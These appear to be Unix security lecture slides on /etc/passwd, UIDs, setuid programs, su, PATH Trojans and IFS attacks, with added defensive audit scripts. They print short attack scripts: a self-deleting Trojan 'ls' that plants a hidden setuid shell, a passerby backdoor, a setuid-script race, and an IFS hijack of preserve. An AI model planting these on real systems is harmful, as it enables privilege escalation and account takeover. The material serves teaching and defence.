Shell

The Attack and Defense of Computers (電腦攻擊與防禦)
Dr. 許富皓
Passwords in Unix/Linux Systems
/etc/passwd
Format: one line per account, seven colon-separated fields:
  account name : encrypted password : uid : gid : user name : home directory : login shell
  e.g. Rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
System Function Accounts
Unix opens special accounts for a variety of system functions (e.g. daemon, sys, ftp, nobody, uucp):
  daemon:*:1:1::/tmp:
  ftp:*:3:3:FTP User:/usr/spool/ftp:
  nobody:*:60001:60001::/tmp:
  uucp:*:4:4::/usr/spool/uucppublic:/usr/lib/uucp/uucico
The "*" in the password field matches no encrypted password, so nobody can use login to log into these accounts. (This does not cover trusted host/user access such as rlogin, which skips the password check.)
Password Crackers
  John the Ripper password cracker -- Linux
  Ophcrack 2 -- Windows
One-Time Passwords
  Delivered as a printed password list, a small card, or a calculator-style token.
UID, GID, and SUID
Account Name and UID
UID 0 is root.
A system identifies a user by her/his UID, not by her/his name.
  e.g. name root with UID 100: no root privilege
       name doggy with UID 0: root privilege
Good habit: the user name root should be reserved for system administrators.
Users with different user names but the same UID are treated as the same user by the system.
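As an added example (not from the lecture), a POSIX sh audit of an /etc/passwd-style file for the points above: a UID-0 account under a name other than root, two names sharing one UID, an empty password field, and malformed lines. The sample file is constructed for the demo.

```shell
#!/bin/sh
# Added example: audit an /etc/passwd-style file for the issues the slides
# describe. Pass a file path; one finding per line goes to stdout.
audit_passwd() {
    awk -F: '
        NF != 7 { printf "malformed-line %d\n", NR; next }
        # empty second field: the account can be entered without a password
        $2 == "" { printf "empty-password %s\n", $1 }
        # UID 0 grants root privilege whatever the account name is
        $3 == 0 && $1 != "root" { printf "uid0-alias %s\n", $1 }
        # two names with one UID are the same user to the kernel
        ($3 in seen) { printf "dup-uid %s %s %s\n", $3, seen[$3], $1 }
        { seen[$3] = $1 }
    ' "$1"
}

# Constructed sample file (not a real system's passwd) used for the demo.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:*:1:1::/tmp:
ftp:*:3:3:FTP User:/usr/spool/ftp:
doggy:x:0:0:Doggy:/tmp:/bin/sh
guest::500:100:Guest:/home/guest:/bin/sh
rachel:eH5/.mj7NB3dx:181:100:Rachel Cohen:/u/rachel:/bin/ksh
arlin:x:181:101:Arlin:/u/arlin:/bin/sh
broken:x:7:7:missing fields
EOF

# Expected findings: uid0-alias doggy, dup-uid 0 root doggy,
# empty-password guest, dup-uid 181 rachel arlin, malformed-line 8
audit_passwd "$SAMPLE"
```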
Real UIDs and Effective UIDs
A Unix process has at least these two IDs:
  Real UID: the process owner's real identity; it matches the username the owner logged in as.
  Effective UID: the system decides a process's privileges based on this ID.
Usually these two IDs of a process are the same.
setuid or SUID program
When a setuid program is run, the process takes on an effective UID equal to the owner of the file, while the real UID remains that of the user who started the process.
Set the bit with chmod 4xxx filename, e.g.
  $ chmod 4757 program_name
  $ ls -al
  ..
  -rwsr-xrwx root user 16384 Sep 3 2005 program_name
The "s" in the owner's execute position is the setuid indicator. (Note that the trailing 7 also leaves this file world-writable, so any user could replace its contents; a setuid program should be mode 4755 or tighter.)
setuid program examples: su, passwd
Group
Each user belongs to a primary group, which is stored in the /etc/passwd file.
The /etc/group file contains every group in the system and its gid:
  vision:*:101:Keith,arlin,janice
  users:*:100:
  startrek:*:102:janice,karen,arlin
Each user can belong to several different groups, but her/his gid can be the gid of only one of the groups she/he belongs to at a time.
A user can use the command newgrp to change her/his gid.
  Case 1: the user is not listed as a member of the group, so the group password is required.
  Case 2: the user is listed as a member, so no password is needed.
su: Substitute User
  %whoami
  tim
  %su john
  Password: *******
  %whoami
  john
  ========================================
  %su
  Password: ********      <- the superuser password
  # whoami                <- new prompt
  root
  #
Security Problems with su
Type /bin/su with its full path:
  1) to avoid a Trojan horse (another program with the same name in one of the directories listed in the PATH variable);
  2) because the access rights of the directory that contains the Trojan may not be set correctly.
su - (the login form) causes the sub-shell to read all relevant startup files and simulate a login; therefore the new shell uses root's environment variables, including PATH.
Stealing the Superuser Account
Assume the root's PATH variable is as follows: .:xxxxxxx (the current directory is searched first).
Observation: when going into a directory, the first command a user types is usually ls.
A Trojan horse shell script with the name ls:
  %cat ls
  #! /bin/sh
  cp /bin/sh ./stuff/junk/.superdude
  chmod 4555 ./stuff/junk/.superdude
  rm -f $0
  exec /bin/ls ${1+"$@"}
====================================
1) Change the access rights of the user's home directory so that the victim must use the root account to see its contents:
  %cd
  %chmod 700 .
2) Create a file named -f:
  %touch ./-f
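An added example (not part of the slides): a POSIX sh check of a PATH value for the precondition this attack needs, a "." or empty entry that searches the current directory, plus relative entries and world-writable directories where anyone could plant a same-named program. The PATH string used in the demo is constructed.

```shell
#!/bin/sh
# Added example: audit a PATH value for entries that make the ls/su Trojan
# horse possible. Prints one finding per line, nothing for a clean PATH.
# Usage: audit_path "$PATH"
audit_path() {
    # Colon-split the value; an empty entry (e.g. "a::b" or a trailing ":")
    # also means "current directory" to the shell.
    printf '%s:' "$1" | tr ':' '\n' | while IFS= read -r entry; do
        case "$entry" in
            '')  echo "empty-entry (current directory)" ;;
            .)   echo "dot-entry . (current directory)" ;;
            /*)  # absolute entry: flag it if others can write into it
                 if [ -d "$entry" ] &&
                    [ -n "$(find "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                     echo "world-writable $entry"
                 fi ;;
            *)   echo "relative-entry $entry" ;;
        esac
    done
}

# Demo with a constructed PATH: a dot entry, an empty entry, a relative
# entry and a world-writable directory created just for the demo.
DEMO_DIR=$(mktemp -d)
chmod 777 "$DEMO_DIR"
audit_path ".:/usr/bin::bin:$DEMO_DIR"
```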
Account Stealing by Passersby
  $ cp /bin/sh /tmp/break-acct
  $ chmod 4755 /tmp/break-acct
When a user leaves her/his terminal unattended, a bystander can easily create a backdoor just by typing the above commands.
Shells and Shell Scripts
Shell
Also called a command line interpreter.
When you log in to a system, it displays a prompt on the screen and waits for you to enter a command.
A running shell is also a process.
Some of the well-known shells:
  Bourne shell (/bin/sh)
  Bourne Again shell (/bin/bash)
  Korn shell (/bin/ksh)
  C shell (/bin/csh)
Shell Script
A shell script is a series of commands written in a plain text file.
In order to make a shell script executable, its file permission must be changed to executable.
Usually the first line of a shell script names the interpreter, e.g.
  #! /bin/sh
followed by a series of commands.
Security Problems of SUID Shell Scripts
Two shells are involved in the execution of a shell script:
  the shell that accepts the shell script command, and
  the shell that executes the shell script.
Race condition:
  $ cd /tmp
  $ ln /etc/setid_script temp
  $ nice -20 temp &
  $ mv my_script temp
Between the time the kernel opens the file to see which interpreter to run, and when the (now-set-id) interpreter turns around and reopens the file to interpret it, an attacker might change the file (directly or via symbolic links).
Solution: /dev/fd
When the kernel passes the name of the set-id script to the interpreter to open, rather than using a pathname (which would permit the race condition) it instead passes the filename /dev/fd/3.
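Added example (not from the lecture): a POSIX sh scan for set-uid/set-gid files that are interpreter scripts, the kind exposed to the open/reopen race above; the demo tree is constructed with mktemp. Linux ignores the set-id bits on scripts, so on Linux a hit is a misconfiguration to clean up; on a system without the /dev/fd fix it is the race itself.

```shell
#!/bin/sh
# Added example: list set-id files under DIR whose first two bytes are the
# "#!" magic, i.e. scripts the kernel would hand to an interpreter by name.
# Usage: find_setid_scripts DIR
find_setid_scripts() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # dd reads exactly the two bytes the kernel checks for "#!"
        if [ "$(dd if="$f" bs=2 count=1 2>/dev/null)" = '#!' ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed demo tree: one set-uid script (should be reported), one plain
# script and one set-uid non-script (neither should be reported).
DEMO=$(mktemp -d)
printf '#! /bin/sh\necho hello\n' > "$DEMO/setid_script"
chmod 4755 "$DEMO/setid_script"
printf '#! /bin/sh\necho hello\n' > "$DEMO/plain_script"
chmod 755 "$DEMO/plain_script"
printf 'not a script\n' > "$DEMO/setid_binary"
chmod 4755 "$DEMO/setid_binary"

# prints only: $DEMO/setid_script
find_setid_scripts "$DEMO"
```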
IFS Security
IFS Environment Variable
The IFS (internal field separator) specifies which characters separate the words of a command. It is normally set to space, tab, and newline.
IFS and Shell Script Security
By changing the IFS, a hacker can change which programs our script executes.
Suppose our script calls the /usr/bin/passwd program. Changing the IFS to "/" with
  % export IFS='/'
causes the script to no longer run /usr/bin/passwd, but instead to run the command usr with the arguments bin and passwd. Now a hacker can create a script called usr that generates a root shell.
Security Hole in /usr/lib/preserve
The vi preserve/recover mechanism:
  1. A user logs in (e.g. via telnet) and edits a file with vi.
  2. The connection is disconnected.
  3. preserve saves the file in a restricted area.
  4. The recover program reads the file back from that area.
/usr/lib/preserve and /bin/mail
preserve was installed SUID root.
preserve ran /bin/mail as the root user to alert users that their files had been preserved.
preserve executed the mail program with the system() function call, which parses a string into command, options, and arguments according to the content of IFS.
Change IFS to Execute a Different Program/Script
If IFS='/', then preserve will execute bin mail instead of /bin/mail:
  % cat bin
  #! /bin/sh
  cd /home/mydir/bin
  cp /bin/sh ./sh
  chown root sh
  chmod 4755 sh
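Added example (not from the lecture), covering both the passwd and the preserve cases above: a POSIX sh function that shows how an inherited IFS of "/" changes the command word an unquoted expansion resolves to, beside the two defences a privileged script should apply first, quoting the expansion and resetting IFS and PATH in a prologue. Modern POSIX shells apply IFS only to the results of unquoted expansions, so the command path is held in a variable; the function and its mode names are this example's own.

```shell
#!/bin/sh
# Added example: resolve the command word of CMD the way the shell would
# given the IFS the script inherited (CALLER_IFS plays the exported IFS).
#   unquoted : $cmd expanded unquoted, subject to the inherited IFS
#   quoted   : "$cmd" expanded quoted, never split
#   hardened : defensive prologue (reset IFS and PATH), then unquoted
# Runs in a subshell so the caller's IFS and PATH are untouched.
command_word() (
    mode=$1; caller_ifs=$2; cmd=$3
    IFS=$caller_ifs                  # the environment the script inherited
    case $mode in
        hardened)
            unset IFS                # back to the default <space><tab><newline>
            PATH=/usr/bin:/bin; export PATH
            set -- $cmd ;;
        quoted)
            set -- "$cmd" ;;
        *)
            set -- $cmd ;;
    esac
    # a leading separator may yield an empty first field; drop it
    if [ -z "$1" ]; then shift; fi
    printf '%s\n' "$1"
)

command_word unquoted / /usr/bin/passwd   # prints: usr
command_word quoted   / /usr/bin/passwd   # prints: /usr/bin/passwd
command_word hardened / /bin/mail         # prints: /bin/mail
```

With the attacker's IFS the unquoted form resolves to usr (or bin for /bin/mail), which is exactly the name the slide's Trojan script takes; either defence keeps the full path intact.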